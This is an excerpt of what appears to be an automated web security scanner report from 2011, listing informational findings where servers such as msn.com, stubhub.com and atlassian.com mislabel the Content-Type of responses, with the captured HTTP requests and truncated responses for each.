...IHDR...Z...H.....v.......tEXtSoftware.Adobe ImageReadyq.e<..
.IDATx...?.+G...G.G...pK...ED.S..#DG..P..FQ:#.D.8....'BH....H.n...".E.....    ..?.....w..]..{o.H#..g..3.<...;s...{O...S...zh...|g.
...[SNIP]...

29.38. http://video.msn.com/services/user/info  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://video.msn.com
Path:   /services/user/info

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /services/user/info?callback=jsonp1311088599886&responseEncoding=json&uxmkt=en-US HTTP/1.1
Host: video.msn.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/about-bing/bing-video/1hh72z4pd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MUID=E361C23374E642C998D8ABA7166A75EC; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; Sample=93; SRCHHPGUSR=AS=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Machine: CH1********302
Set-Cookie: zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; domain=msn.com; expires=Tue, 26-Jul-2011 15:16:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:35 GMT
Content-Length: 185
Connection: keep-alive

jsonp1311088599886({"user":{"country":{"name":{"$":'US'},"flags":{"$":'40000000'},"zip":{"$":'75207'},"$":null},"market":{"name":{"$":'en-us'},"enabled":{"$":'True'},"$":null},"$":""}})

29.39. http://waypointlivingspaces.com/sites/default/files/waypoint_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://waypointlivingspaces.com
Path:   /sites/default/files/waypoint_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/default/files/waypoint_favicon.ico HTTP/1.1
Host: waypointlivingspaces.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=p5hnf2vbssre64l1tg1gvd29q4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:48:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 16:08:00 GMT
ETag: "6530cd2-47c-64831800"
Accept-Ranges: bytes
Content-Length: 1148
Cache-Control: max-age=1209600
Expires: Tue, 02 Aug 2011 20:48:56 GMT
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... ............................................ ...p.............TG...w.... .................................................PB.}E7.}F7..QD..nb.......................
...[SNIP]...

29.40. http://www.atlassian.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.atlassian.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.3.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1; selected_language=en

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:38 GMT
Accept-Ranges: bytes
ETag: W/"3638-1259721205000"
Last-Modified: Wed, 02 Dec 2009 02:33:25 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 3638

..............h...&... ..............(....... ...........@.............................g.t9......pRB.>...........[9#..jC.Y*..uJ#......kZ...........|..Z4.l;..P,..1...P...iJ5...v.....bB,......mQ.zZC.b1
...[SNIP]...

29.41. http://www.cesal.ro/js/globalizationro-RO.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cesal.ro
Path:   /js/globalizationro-RO.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/globalizationro-RO.js HTTP/1.1
Host: www.cesal.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.cesal.ro/
Cookie: ASP.NET_SessionId=zwbryr55ojujwp55qkk40245

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 11:33:58 GMT
Accept-Ranges: bytes
ETag: "41b02b1616becb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:41:33 GMT
Content-Length: 22938

.././. .J.S.c.r.i.p.t. .F.i.l.e..
.f.u.n.c.t.i.o.n. .g.e.t.J.S.P.H.(.p.h.). .{..
.    .v.a.r. .t.;..
.    .s.w.i.t.c.h. .(.p.h.). .{..
.    . . . . .c.a.s.e. .".C.o.n.t.a.c.t._.S.e.l.e.c.t.a.t.i.D.e.s.t.i.
...[SNIP]...

29.42. http://www.factset.com/files/xmlfeeds/current.fds  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.factset.com
Path:   /files/xmlfeeds/current.fds

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /files/xmlfeeds/current.fds?rand=931 HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.factset.com/
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:29 GMT
Server: Apache
Last-Modified: Tue, 19 Jul 2011 10:00:01 GMT
ETag: "14c007-136-4a8692dd7ea40"
Accept-Ranges: bytes
Content-Length: 310
Connection: close
Content-Type: text/plain; charset=UTF-8

{"img_src":"/files/xmlfeeds/promo_images/Product_Promo_INVESTMENT_MANAGERS.PNG","alt":"Tour FactSet's solutions for Investment Managers. Enhance your entire investment process, including equity analys
...[SNIP]...

29.43. http://www.fansnap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fansnap.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ver=1; vid=256; tvid=1342567440282625; _fancat_session=BAh7CzoPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoRdG1wX3Zpc2l0X2lkaQQoXWQfOghsb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQAs6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huASsdhrgY6C29mZnNldGn%2BkJ0%3D--a4e7d50e911fa2aa00fa78b6813230ff63be4d43; POOLID=B; __utma=19633071.1263508421.1311101027.1311101027.1311101027.1; __utmb=19633071; __utmc=19633071; __utmz=19633071.1311101027.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Sep 2008 05:44:59 GMT
ETag: "9d09aa-1536-563d8cc0"
Accept-Ranges: bytes
Content-Length: 5430
Connection: close
Content-Type: text/plain; charset=UTF-8

...... .... .....&......... .h.......(... ...@..... .................................%.,.C.J.C.J.C.J.C.J.C.J.A.G.".(...................................................................................
...[SNIP]...

29.44. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Scrum HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=bUlBHSw9RyrvSttR5U3rNRUYEyCIoOHEeyqLUjvZvJYsnwvg_xFWbDFu8wRsyPCX0JzpkjV16vXwqOAIqiLeg1KuBr3sTsQOG_a12u1qyWQimnfWv4FY2HkQyWm7z0tD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:21 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 22722

BfyINKgQ....S.......J..k...=.....}s#..Scrum.7$..YHZMlTs-LNIr40gHfpLjSCg",kEXPI:"17259,23756,24692,24878,24879,27400,28505,29702,29859,30316,30465,30727,31388,31406,31493",kCSI:{e:"17259,23756,24692,24
...[SNIP]...

29.45. http://www.googlelabs.com/show_app_thumbnail  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.googlelabs.com
Path:   /show_app_thumbnail

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /show_app_thumbnail?app_key=agtnbGFiczIwLXd3d3IVCxIMTGFic0FwcE1vZGVsGKmMtwIM HTTP/1.1
Host: www.googlelabs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlelabs.com/

Response

HTTP/1.1 200 OK
Content-Language: en-us
Content-Type: image/png
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: public, max-age=604800
Date: Tue, 19 Jul 2011 20:47:35 GMT
Server: Google Frontend
Content-Length: 2582

GIF89aN.N....c.f..h..l..n..q..t..w..z..~..............................................................................................................................................................
...[SNIP]...

29.46. http://www.mookie1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mookie1.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_xxx_qppm_iuuq=ffffffff0949011c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:17 GMT
Server: Apache
Last-Modified: Tue, 04 Aug 2009 20:27:52 GMT
ETag: "11a1dbe-57e-47056b8840200"
Accept-Ranges: bytes
Cteonnt-Length: 1406
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: private
Content-Length: 1406

..............h.......(....... ....................................0...1................................................................................................................................
...[SNIP]...

29.47. http://www.netlogiq.ro/ajaxpro/Layout,App_Web_glwxmlys.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netlogiq.ro
Path:   /ajaxpro/Layout,App_Web_glwxmlys.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

POST /ajaxpro/Layout,App_Web_glwxmlys.ashx HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
Content-Length: 9
Origin: http://www.netlogiq.ro
X-AjaxPro-Method: RemoveProduct
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: text/plain; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245; sifrFetch=true; __utma=147345704.25025431.1311097255.1311097255.1311097255.1; __utmb=147345704.1.10.1311097255; __utmc=147345704; __utmz=147345704.1311097255.1.1.utmcsr=umfcluj.ro|utmccn=(referral)|utmcmd=referral|utmcct=/search.aspx

{"vID":0}

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: Products=; expires=Mon, 18-Jul-2011 17:40:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:42 GMT
Content-Length: 5

[];/*

29.48. http://www.rallydev.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rallydev.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.rallydev.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2g3gkrl3hj7h7nuupane9re3r3; __utma=45646267.1491315281.1311085247.1311085247.1311085247.1; __utmb=45646267.1.10.1311085247; __utmc=45646267; __utmz=45646267.1311085247.1.1.utmgclid=CMWl_YzNjaoCFYpd5Qodq3Z4og|utmccn=(not%20set)|utmcmd=(not%20set)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 21 Feb 2011 18:49:27 GMT
ETag: "627e-49ccf52bb1bc0"
Accept-Ranges: bytes
Cache-Control: max-age=86401, public
Expires: Wed, 20 Jul 2011 14:20:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NON DSP COR CURa PSAa PSDa OUR NOR BUS PUR COM NAV STA"
Content-Length: 25214
Content-Type: text/plain; charset=UTF-8

....    .........(...............h............. .h...&... .............. ..........v... .... .........00......h....'..00..............00.... ..%...<..(....... ......................................f..
...[SNIP]...

29.49. http://www.res-x.com/ws/r2/Resonance.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ws/r2/Resonance.aspx?appid=GAMESTOP01&tk=783322707284241&ss=463845686754211&sg=1&pg=res11071909286917156673463&vr=3.5x&bx=false&ur=http%3A//www.gamestop.com/&plk=952714%7Chome_rr;952810%7Chome_rr;930404%7Chome_rr;952680%7Chome_rr;952223%7Chome_rr;952722%7Chome_rr;60822;63851;39213;74392;62255;60655;75847;91832;90818;90820;90819;90578;60227;89429;91018;91051;60822;64525;84723;1499;90414;91052;75763;7882;64004;90860;91538;78346;78062;75737;42694;68371;90216;74240;89143;75200;90173;91255;72574;90175;89141;90445;91020;90367;&rf= HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 19 Jul 2011 16:04:40 GMT
Content-Length: 10

<!-- //-->

29.50. http://www.seapine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.seapine.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.seapine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SourceKey=201107191020391579; __utma=192179752.1795370187.1311085249.1311085249.1311085249.1; __utmb=192179752.1.10.1311085249; __utmc=192179752; __utmz=192179752.1311085249.1.1.utmcsr=GoogleAdwords|utmccn=BugTrackingAdgroup|utmcmd=Search; _mkto_trk=id:624-VQC-743&token:_mch-seapine.com-1311085249503-78743

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:59 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 16 Jul 2007 14:11:19 GMT
ETag: "57d6-8e2efc0"
Accept-Ranges: bytes
Content-Length: 22486
Cache-Control: max-age=29030400
Expires: Tue, 19 Jun 2012 14:20:59 GMT
Content-Type: text/plain

......00..........f... ......................h.......00.... ..%...... .... ......B........ .h...nS..(...0...`.................................J.......z.......b...............n...........V...........
...[SNIP]...

29.51. http://www.stubhub.com/content/getPromoContent  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stubhub.com
Path:   /content/getPromoContent

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /content/getPromoContent HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
Content-Length: 27
Origin: http://www.stubhub.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; fsr.a=1311100549160; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; s_sess=%20s_cc%3Dtrue%3B

pageType=BrowseTicketDetail

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: Apache
Set-Cookie: TLTHID=01333828B23610B20B11F351420A2498; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
com-stubhub-dye: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 71

<?xml version="1.0" encoding="UTF-8"?><blocks>No Promo Content</blocks>

29.52. http://www.stubhub.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stubhub.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; 